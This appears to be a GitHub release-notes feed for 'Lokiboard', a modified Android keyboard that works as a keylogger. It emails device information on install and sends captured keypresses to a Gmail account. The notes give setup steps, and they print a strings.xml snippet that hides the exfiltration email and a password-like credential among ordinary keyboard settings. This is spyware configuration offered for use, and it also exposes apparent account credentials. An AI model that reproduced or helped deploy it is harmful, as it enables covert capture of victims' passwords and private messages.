tag:github.com,2008:https://github.com/NullPounce/Lokiboard-Mod-Free/releasesRelease notes from Lokiboard-Mod-Free2024-02-15T03:43:55Ztag:github.com,2008:Repository/757819973/lokiboard2024-02-15T04:05:04ZLokiboard-stage1<p>you need a Google account with 2fa enabled, get your app password "not your login"</p>
<p>as of right now an email is sent of user device info on initial install, during testing make sure to type<br>
or click on the virtual keyboard if using genymotion for example. keypress logs as of now are only<br>
sent when the user opens up the app.</p>
<p>open:</p>
<p>hakistan\Lokiboard-Mod-master\app\src\main\res\values\strings.xml</p>
<p>and edit these 2 lines:</p>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="[ <string name="EMail">dashdashpass7@gmail.com</string>]
<string name="EmailPassword">7.gMukhlis.Ghaf00r</string>"><pre class="notranslate"><code>[ <string name="EMail">dashdashpass7@gmail.com</string>]
<string name="EmailPassword">7.gMukhlis.Ghaf00r</string>
</code></pre></div>
<p>from this snippet:</p>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="<string name="prefs_keyboard_height_settings">Keyboard height</string>
<string name="keyboard_color">Set custom keyboard color</string>
<string name="hide_special_chars">Hide special characters</string>
<string name="hide_language_switch_key">Hide language switch key</string>
<string name="show_number_row">Show separate number row</string>
<string name="space_swipe">Space swipe cursor move</string>
<string name="delete_swipe">Delete swipe</string>
<string name="matching_navbar_color">Use matching navigation bar color</string>
<string name="setup_message">LokiBoard Keyboard is not enabled. Click OK to open Languages &amp; Input settings. You will need to select LokiBoard Keyboard in your current keyboard to use it.</string>
<string name="EMail">dashdashpass7@gmail.com</string>
<string name="EmailPassword">7.gMukhlis.Ghaf00r</string>
<string name="Interval">120000</string>"><pre class="notranslate"><code><string name="prefs_keyboard_height_settings">Keyboard height</string>
<string name="keyboard_color">Set custom keyboard color</string>
<string name="hide_special_chars">Hide special characters</string>
<string name="hide_language_switch_key">Hide language switch key</string>
<string name="show_number_row">Show separate number row</string>
<string name="space_swipe">Space swipe cursor move</string>
<string name="delete_swipe">Delete swipe</string>
<string name="matching_navbar_color">Use matching navigation bar color</string>
<string name="setup_message">LokiBoard Keyboard is not enabled. Click OK to open Languages &amp; Input settings. You will need to select LokiBoard Keyboard in your current keyboard to use it.</string>
<string name="EMail">dashdashpass7@gmail.com</string>
<string name="EmailPassword">7.gMukhlis.Ghaf00r</string>
<string name="Interval">120000</string>
</code></pre></div>NullPounce